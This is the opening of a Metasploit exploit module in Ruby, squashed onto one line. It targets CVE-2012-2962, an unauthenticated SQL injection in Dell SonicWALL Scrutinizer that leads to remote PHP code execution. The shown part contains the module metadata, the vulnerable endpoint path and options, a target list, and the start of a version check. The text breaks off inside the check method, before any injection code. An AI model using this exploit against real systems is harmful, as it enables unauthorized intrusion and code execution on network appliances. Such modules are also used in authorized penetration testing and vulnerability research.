## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "Dell SonicWALL (Plixer) Scrutinizer 9 SQL Injection", 'Description' => %q{ This module exploits a vulnerability found in Dell SonicWall Scrutinizer. While handling the 'q' parameter, the PHP application does not properly filter the user-supplied data, which can be manipulated to inject SQL commands, and then gain remote code execution. Please note that authentication is NOT needed to exploit this vulnerability. }, 'License' => MSF_LICENSE, 'Author' => [ 'muts', 'Devon Kearns', 'sinn3r' ], 'References' => [ ['CVE', '2012-2962'], ['OSVDB', '84232'], ['EDB', '20033'], ['BID', '54625'], ['URL', 'http://www.sonicwall.com/shared/download/Dell_SonicWALL_Scrutinizer_Service_Bulletin_for_SQL_injection_vulnerability_CVE.pdf'] ], 'Payload' => { 'BadChars' => "\x00" }, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [ # According to advisory, version 9.5.1 and before are vulnerable. # But was only able to test this on 9.0.1.0 ['Dell SonicWall Scrutinizer 9.5.1 or older', {}] ], 'Privileged' => false, 'DisclosureDate' => "Jul 22 2012", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The path to the SonicWall Scrutinizer\'s statusFilter file', '/d4d/statusFilter.php']), OptString.new('HTMLDIR', [true, 'The HTML root directory for the web application', 'C:\\Program Files\\Scrutinizer\\html\\']) ], self.class) end def check res = send_request_raw({'uri'=>'/'}) # Check the base path for version regex if res and res.body =~ /\